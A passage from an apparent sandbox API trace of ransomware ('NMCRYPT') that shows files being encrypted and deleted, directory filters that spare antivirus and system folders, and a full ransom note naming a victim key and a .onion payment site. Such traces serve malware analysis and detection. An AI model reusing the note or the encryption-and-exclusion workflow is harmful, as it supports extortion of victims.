lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.840] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.840] GetLastError () returned 0x0 [0166.840] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.840] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.840] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.840] GetLastError () returned 0x0 [0166.840] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.840] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.841] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.841] GetLastError () returned 0x0 [0166.841] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.841] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.841] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.841] GetLastError () returned 0x0 [0166.841] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.841] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x8e, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x8e, lpOverlapped=0x0) returned 1 [0166.841] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x8e, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x90) returned 1 [0166.841] GetLastError () returned 0x0 [0166.841] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x90, lpOverlapped=0x0) returned 1 [0166.841] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x0, lpOverlapped=0x0) returned 1 [0166.841] WriteFile (in: hFile=0x15c4, lpBuffer=0x2892010*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesWritten=0x2d7eb1c*=0x0, lpOverlapped=0x0) returned 1 [0166.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 0x20 [0166.841] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp", dwFileAttributes=0x20) returned 0 [0166.841] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 1 [0166.841] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 1 [0166.842] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0166.842] wcslen (_String="OK") returned 0x2 [0166.842] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.842] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.842] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0166.842] CryptDestroyHash (hHash=0x9ad838) returned 1 [0166.842] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0166.842] FindNextFileW (in: hFindFile=0x9ad378, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0 [0166.842] GetLastError () returned 0x12 [0166.842] FindClose (in: hFindFile=0x9ad378 | out: hFindFile=0x9ad378) returned 1 [0166.842] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\Recovers your files.html" (normalized: "c:\\program files\\common files\\services\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0166.842] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0166.843] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0166.843] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.843] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.843] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.843] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.843] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.843] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*.exe") returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*.dll") returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*.lnk") returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*.bat") returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*.ini") returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*.msi") returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*.scf") returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*pagefile.sys*") returned 0 [0166.843] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*AppData*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\winrar\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\java\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\windows\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\ESET\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\AVG\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*Atheros*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*Realtek*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*bootmgr*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*boot*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*boot*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*IO.SYS*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*ntldr*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*chrome*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*opera*") returned 0 [0166.844] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\*", pszSpec="*firefox*") returned 0 [0166.844] wcslen (_String="\\\\?\\") returned 0x4 [0166.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0x9ad438 [0166.844] wcscmp (_String1=".", _String2=".") returned 0 [0166.844] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.844] wcscmp (_String1="..", _String2=".") returned 1 [0166.844] wcscmp (_String1="..", _String2="..") returned 0 [0166.844] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.844] wcscmp (_String1="ado", _String2=".") returned 1 [0166.844] wcscmp (_String1="ado", _String2="..") returned 1 [0166.844] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.844] PathMatchSpecW (pszFile="DirectDB.dll", pszSpec="*NMCRYPT") returned 0 [0166.844] PathMatchSpecW (pszFile="DirectDB.dll", pszSpec="*Recovers your files.html") returned 0 [0166.844] PathMatchSpecW (pszFile="DirectDB.dll", pszSpec="*.exe") returned 0 [0166.844] PathMatchSpecW (pszFile="DirectDB.dll", pszSpec="*.dll") returned 1 [0166.844] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.844] wcscmp (_String1="en-US", _String2=".") returned 1 [0166.844] wcscmp (_String1="en-US", _String2="..") returned 1 [0166.844] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.844] wcscmp (_String1="msadc", _String2=".") returned 1 [0166.844] wcscmp (_String1="msadc", _String2="..") returned 1 [0166.844] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.845] wcscmp (_String1="Ole DB", _String2=".") returned 1 [0166.845] wcscmp (_String1="Ole DB", _String2="..") returned 1 [0166.845] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.845] PathMatchSpecW (pszFile="wab32.dll", pszSpec="*NMCRYPT") returned 0 [0166.845] PathMatchSpecW (pszFile="wab32.dll", pszSpec="*Recovers your files.html") returned 0 [0166.845] PathMatchSpecW (pszFile="wab32.dll", pszSpec="*.exe") returned 0 [0166.845] PathMatchSpecW (pszFile="wab32.dll", pszSpec="*.dll") returned 1 [0166.845] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.845] PathMatchSpecW (pszFile="wab32res.dll", pszSpec="*NMCRYPT") returned 0 [0166.845] PathMatchSpecW (pszFile="wab32res.dll", pszSpec="*Recovers your files.html") returned 0 [0166.845] PathMatchSpecW (pszFile="wab32res.dll", pszSpec="*.exe") returned 0 [0166.845] PathMatchSpecW (pszFile="wab32res.dll", pszSpec="*.dll") returned 1 [0166.845] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0 [0166.845] GetLastError () returned 0x12 [0166.845] FindClose (in: hFindFile=0x9ad438 | out: hFindFile=0x9ad438) returned 1 [0166.845] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.845] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.845] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.845] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.845] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.845] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.845] wcslen (_String="\\\\?\\") returned 0x4 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*.exe") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*.dll") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*.lnk") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*.bat") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*.ini") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*.msi") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*.scf") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*pagefile.sys*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*AppData*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\winrar\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\java\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\windows\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\ESET\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\AVG\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*Atheros*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*Realtek*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*bootmgr*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*boot*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*boot*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*IO.SYS*") returned 0 [0166.846] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.846] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.846] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*ntldr*") returned 0 [0166.846] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*chrome*") returned 0 [0166.846] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*opera*") returned 0 [0166.846] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\*", pszSpec="*firefox*") returned 0 [0166.846] wcslen (_String="\\\\?\\") returned 0x4 [0166.846] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad478 [0166.847] wcscmp (_String1=".", _String2=".") returned 0 [0166.847] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.847] wcscmp (_String1="..", _String2=".") returned 1 [0166.847] wcscmp (_String1="..", _String2="..") returned 0 [0166.847] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*NMCRYPT") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*Recovers your files.html") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*.exe") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*.dll") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*.lnk") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*.bat") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*.ini") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*.msi") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*.scf") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*pagefile.sys*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*NTUSER.DAT*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*AppData*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\winrar\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\java\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\TeamViewer\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\windows\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\ESET\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\AVG\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\AVIRA\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*\\AVAST Software\\*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*Atheros*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*Realtek*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*bootmgr*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*boot*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*boot*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*CONFIG.SYS*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*IO.SYS*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*MSDOS.SYS*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*NTDETECT.COM*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*ntldr*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*chrome*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*opera*") returned 0 [0166.847] PathMatchSpecW (pszFile="adojavas.inc", pszSpec="*firefox*") returned 0 [0166.847] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", pszSpec="*") returned 1 [0166.847] strlen (_Str="NMoreira") returned 0x8 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: 